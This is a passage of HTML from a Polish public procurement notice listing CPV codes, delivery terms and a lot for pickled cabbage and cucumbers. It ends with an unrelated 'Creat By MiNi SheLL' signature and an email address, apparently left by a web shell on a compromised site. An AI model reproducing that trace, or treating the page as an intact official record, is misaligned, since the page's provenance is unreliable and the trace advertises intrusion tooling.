<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.13.00-9, 03.22.14.00-0, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.12.10-1, 03.22.11.13-1, 03.22.11.11-7, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.13.10-2, 03.22.23.21-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 128.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa kiszone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Kapusta kwaszona z marchewką, bez konserwantów, jednostka miary kilogram, ilość 3.300 kg,
2)	Ogórek kiszony - twardy, o długości od 8cm do 10cm i średnicy od 3cm do 4cm, w całości, jednostka miary kilogram, ilość 1.300 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.40-0, 15.33.11.42-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 128.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com